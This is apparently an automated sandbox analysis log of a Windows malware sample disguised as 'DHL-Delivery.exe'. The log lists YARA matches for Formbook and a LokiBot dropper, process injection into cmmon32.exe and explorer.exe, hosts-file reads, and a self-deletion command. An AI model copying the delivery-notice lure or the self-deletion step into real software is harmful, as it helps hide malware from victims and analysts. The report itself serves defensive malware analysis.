    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00C99E4010_2_00C99E40
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00CADF8110_2_00CADF81
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_00C92FB010_2_00C92FB0
    Source: C:\Windows\explorer.exeCode function: 18_2_052CFA3218_2_052CFA32
    Source: C:\Windows\explorer.exeCode function: 18_2_052CAB2218_2_052CAB22
    Source: C:\Windows\explorer.exeCode function: 18_2_052CD13218_2_052CD132
    Source: C:\Windows\explorer.exeCode function: 18_2_052D2B0E18_2_052D2B0E
    Source: C:\Windows\explorer.exeCode function: 18_2_052CAB1F18_2_052CAB1F
    Source: C:\Windows\explorer.exeCode function: 18_2_052D2A6F18_2_052D2A6F
    Source: C:\Windows\explorer.exeCode function: 18_2_052C606918_2_052C6069
    Source: C:\Windows\explorer.exeCode function: 18_2_052CE86218_2_052CE862
    Source: C:\Windows\explorer.exeCode function: 18_2_052C607218_2_052C6072
    Source: C:\Windows\explorer.exeCode function: 18_2_052C7CEC18_2_052C7CEC
    Source: C:\Windows\explorer.exeCode function: 18_2_052C7CF218_2_052C7CF2
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeCode function: 25_3_000001EEA429CBB125_3_000001EEA429CBB1
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: String function: 1E1343E0 appears 31 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: String function: 1E122AC0 appears 37 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: String function: 1E0DB1F0 appears 272 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: String function: 1E134384 appears 99 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: String function: 1E16C650 appears 102 times
    Source: C:\Users\user\Desktop\DHL-Delivery.exeCode function: String function: 1E15BDA0 appears 96 times
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04CE4384 appears 97 times
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C8B1F0 appears 268 times
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04D0BDA0 appears 96 times
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04D1C650 appears 102 times
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04CD2AC0 appears 36 times
    Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464
    Source: DHL-Delivery.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: DHL-Delivery.exe, 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePINGVINER.exe vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000000.00000002.1739181102.0000000002170000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000000.1736478550.0000000000413000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePINGVINER.exe vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000003.2176093284.00000000007C7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs DHL-Delivery.exe
    Source: DHL-Delivery.exe, 00000006.00000002.2192283452.000000001DC00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs DHL-Delivery.exe
    Source: DHL-Delivery.exeBinary or memory string: OriginalFilenamePINGVINER.exe vs DHL-Delivery.exe
    Source: C:\Users\user\Desktop\DHL-Delivery.exeSection loaded: vb6zz.dllJump to behavior
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000A.00000002.3586431196.0000000000D98000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000010.00000000.2601163348.000000000198F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000010.00000000.2601163348.000000000198F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 0000000A.00000002.3609825836.000000000519F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
    Source: 00000007.00000002.2756480379.000000001593F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F date = 2018-02-14 14:10:21, author = Florian Roth, description = Semiautomatic generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/, score = demo, minimum_yara = 1.7
    Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@10/137@6/4
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001e.dbJump to behavior
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4472
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_02
    Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B4.tmpJump to behavior
    Source: unknownProcess created: C:\Windows\explorer.exe
    Source: DHL-Delivery.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\DHL-Delivery.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\DHL-Delivery.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: DHL-Delivery.exeVirustotal: Detection: 34%
    Source: DHL-Delivery.exeMetadefender: Detection: 16%
    Source: DHL-Delivery.exeReversingLabs: Detection: 41%
    Source: unknownProcess created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: unknownProcess created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
    Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DHL-Delivery.exe'
    Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464
    Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
    Source: unknownProcess created: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
    Source: C:\Users\user\Desktop\DHL-Delivery.exeProcess created: C:\Users\user\Desktop\DHL-Delivery.exe 'C:\Users\user\Desktop\DHL-Delivery.exe' Jump to behavior
    Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DHL-Delivery.exe'Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32Jump to behavior
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Binary string: Windows.Data.Activities.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: setupapi.pdbj source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: rtworkq.pdbV source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.Globalization.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: secur32.pdbM source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: syncreg.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: Windows.Storage.Search.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.Internal.Signals.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: authui.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.2671229830.00000243B78F0000.00000004.00000040.sdmp
    Source: Binary string: urlmon.pdbK source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wntdll.pdb source: DHL-Delivery.exe, cmmon32.exe
    Source: Binary string: twinapi.appcore.pdbJ source: WerFault.exe, 0000000F.00000003.2666535192.00000243B77FC000.00000004.00000001.sdmp
    Source: Binary string: HolographicExtensions.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: SLC.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: cscobj.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: SettingMonitor.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: werconcpl.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: WindowsCodecs.pdbJ source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: srvcli.pdbc source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.CloudStore.Schema.Shell.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: msi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.ApplicationModel.pdb source: WerFault.exe, 0000000F.00000003.2668877102.00000243B7804000.00000004.00000001.sdmp
    Source: Binary string: twinui.pcshell.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: yncCore.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: PeopleBand.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: AboveLockAppHost.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ExecModelProxy.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: imapi2.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: CompPkgSup.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: srchadmin.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ApplicationFrame.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ES.pdbG source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wkscli.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: WpnClient.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: shdocvw.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ShellCommonCommonProxyStub.pdbm source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: TileControl.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: OneCoreCommonProxyStub.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: TileDataRepository.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000002.2744697687.000000000FC00000.00000002.00000001.sdmp, explorer.exe, 00000012.00000002.3681120064.0000000007280000.00000002.00000001.sdmp
    Source: Binary string: msvcp110_win.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: DevDispItemProvider.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: nsi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: SndVolSSO.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: winmm.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: TaskFlowUI.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.UI.Core.TextInput.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.UI.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: igdgmm64.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: AppXDeploymentClient.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: Windows.UI.Shell.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: Windows.Media.Devices.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: InputSwitch.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cflapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: DataExchange.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.Internal.Signals.pdbE source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: Bcp47mrm.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000F.00000003.2671229830.00000243B78F0000.00000004.00000040.sdmp
    Source: Binary string: usermgrcli.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wininet.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: prnfldr.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: twinapi.appcore.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: cdp.pdb( source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.Networking.Connectivity.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ActXPrxy.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: Windows.CloudStore.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ColorAdapterClient.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: hcproviders.pdbU source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wpnapps.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: NotificationControllerPS.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: sppc.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: oleacc.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: vaultcli.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: wevtapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: framedynos.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: samcli.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: sspicli.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: ActXPrxy.pdbf source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: UiaManager.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: O.pdb source: WerFault.exe, 0000000F.00000002.2737626059.00000243B47D6000.00000004.00000001.sdmp
    Source: Binary string: dsreg.pdb source: WerFault.exe, 0000000F.00000003.2668827668.00000243B7800000.00000004.00000001.sdmp
    Source: Binary string: Windows.StateRepository.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: ActionCenter.pdb source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.2670924574.00000243B77FB000.00000004.00000001.sdmp
    Source: Binary string: SettingSyncCore.pdb source: WerFault.exe, 0000000F.00000003.2666535192.00000243B77FC000.00000004.00000001.sdmp
    Source: Binary string: Windows.UI.Immersive.pdby source: WerFault.exe, 0000000F.00000003.2667444402.00000243B7809000.00000004.00000001.sdmp
    Source: Binary string: dusmapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
    Source: Binary string: cscapi.pdb source: WerFault.exe, 0000000F.00000003.2669511772.00000243B7909000.00000004.00000040.sdmp
